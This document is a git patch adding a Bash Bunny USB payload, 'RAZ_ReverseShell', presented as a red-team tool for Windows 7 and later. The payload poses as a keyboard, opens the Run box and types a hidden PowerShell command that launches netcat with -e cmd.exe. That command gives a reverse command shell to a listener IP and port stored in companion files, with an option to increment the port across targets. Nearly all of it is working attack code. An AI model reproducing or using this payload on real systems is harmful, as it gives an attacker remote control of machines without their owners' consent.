From c699fb6b72f05e32298e8f1495f9414a11cfc0f3 Mon Sep 17 00:00:00 2001 From: ralphyz Date: Fri, 10 Mar 2017 15:55:23 -0500 Subject: [PATCH] Add files via upload A simple script to create a netcat reverse shell. For Red Teamers - you can auto_increment the listener port by setting a flag to true in payload.txt. netcat.exe is not included and must be sourced elsewhere. --- .../library/RAZ_ReverseShell/listener_ip.txt | 1 + .../RAZ_ReverseShell/listener_port.txt | 1 + payloads/library/RAZ_ReverseShell/payload.txt | 75 +++++++++++++++++++ 3 files changed, 77 insertions(+) create mode 100644 payloads/library/RAZ_ReverseShell/listener_ip.txt create mode 100644 payloads/library/RAZ_ReverseShell/listener_port.txt create mode 100644 payloads/library/RAZ_ReverseShell/payload.txt diff --git a/payloads/library/RAZ_ReverseShell/listener_ip.txt b/payloads/library/RAZ_ReverseShell/listener_ip.txt new file mode 100644 index 00000000..b1c12741 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/listener_ip.txt @@ -0,0 +1 @@ +192.168.1.100 \ No newline at end of file diff --git a/payloads/library/RAZ_ReverseShell/listener_port.txt b/payloads/library/RAZ_ReverseShell/listener_port.txt new file mode 100644 index 00000000..1b824382 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/listener_port.txt @@ -0,0 +1 @@ +4444 \ No newline at end of file diff --git a/payloads/library/RAZ_ReverseShell/payload.txt b/payloads/library/RAZ_ReverseShell/payload.txt new file mode 100644 index 00000000..8b71a3d0 --- /dev/null +++ b/payloads/library/RAZ_ReverseShell/payload.txt @@ -0,0 +1,75 @@ +#!/bin/bash +# +# Title: RAZ_ReverseShell +# Author: RalphyZ +# Version: 1.0 +# Target: Windows 7+ +# Dependencies: The following files must exist in the switch folder: +# nc.exe - Windows binary for netcat with the -e flag +# listener_port.txt - The Port number for the netcat listener +# listener_ip.txt - The IP Address for the netcat listener +# +# Description: Executes a netcat reverse cmd shell at a given IP and Port +# Intentionally, this script leaves a trace in the Run Box +# +# Colors: +# Green.....................Working +# White.....................Completed without error +# White (blinking)..........Incrementing the port in listener_port.txt +# Blue (blinking)...........listener_port.txt was not found +# Light-Blue (blinking).....listener_ip.txt was not found +# Amber (blinking)..........nc.exe was not found + + +# Change this if you want to enable auto_increment of the netcat port +# If true, the port number is increased by 1 everytime the script runs +# This is good for Red Teams doing PenTesting on multiple computers +auto_increment=false + +LED G +ATTACKMODE HID STORAGE + +LANGUAGE='us' + +# Get the switch position +source bunny_helpers.sh + + +# Check for all the files - error if not found. If found, put into variables +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then + LED B 100 + exit 1 +else + my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` +fi + +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then + LED B G 100 + exit 1 +else + my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` +fi + +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then + LED R G 100 + exit 1 +fi + +# Execute the powershell command in the run box with the appropriate variables +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK ENTER + +# If auto_increment, then update the listener_port file +if [ "$auto_increment" = true ] ; then + LED R G B 100 + echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt + + # Allow the write to sync to the USB + sleep 1 +fi + +# Signal everything went OK - white +LED R G B +exit 0